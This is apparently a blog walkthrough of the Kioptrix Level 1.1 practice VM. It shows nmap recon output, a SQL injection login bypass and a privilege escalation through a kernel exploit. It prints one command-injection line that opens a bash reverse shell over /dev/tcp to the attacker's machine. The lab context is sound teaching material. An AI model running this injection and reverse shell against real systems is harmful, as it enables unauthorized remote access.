Kioptrix: Level 1.1 (#2)
[Complete Walkthrough]
Level 1.0 is also solved without metasploit, if you want a look check out the link :-> https://tinyurl.com/jmnyj9h3
Kioptrix 2 VM can be downloaded here.
— — — — — — — — — — — — — — — — — — — —
#Getting VM’s IP
~# netdiscover -r 192.168.230.0/24
By recon i got some initials as shown:-
The detailed report of nmap is shown below:-
cat initials 1 ⚙
# Nmap 7.91 scan initiated Sun Aug 22 14:24:41 2021 as: nmap -T4 -p- -A -oN nmap/initials 192.168.230.134
Nmap scan report for 192.168.230.134
Host is up (0.0019s latency).
Not shown: 65527 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1013/udp status
|_ 100024 1 1016/tcp status
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName= —
| Not valid before: 2009–10–08T00:10:47
|_Not valid after: 2010–10–08T00:10:47
|_ssl-date: 2021–08–22T15:15:29+00:00; -3h09m41s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
1016/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
4149/tcp filtered agslbHost script results:
|_clock-skew: -3h09m41s
Since many of the ports are open, but one that got the eye are 80,3306. So after hoping to the web page, Since I don’t have any credentials, so i tried basic SQL injection, since port scanning gave the clue about port 3306 ;-)
Since the page was static, after viewing source code, there was code error as shown
So after intercepting with burp, by some changes as shown we got access to the page ;-))
I tried with netcat but seems target eithered filtered or nc is not available on his/her machine,
NOW WHAT????
nc was listening on my machine and i created the reverse shell by:-
192.168.230.128; bash -i >& /dev/tcp/192.168.230.128/4444 0>&1
We got a Shell!!!!, now look around and start enumerating the machine, its version etc.
After Enumeration, i found the kernal exploit of this machine, i saved the file with name as shown and transferred to the victim. See the following image, it describes it all
And now we are ROOT!!!!!!!, This was all about this machine, hope you find something useful.
— — — — — — — — — — — — — — — — — -
May the knowledge i shared, empowers you..
That’s all for now
Until Next Time,
Stay Humble!!
— — — — — — — — — — -
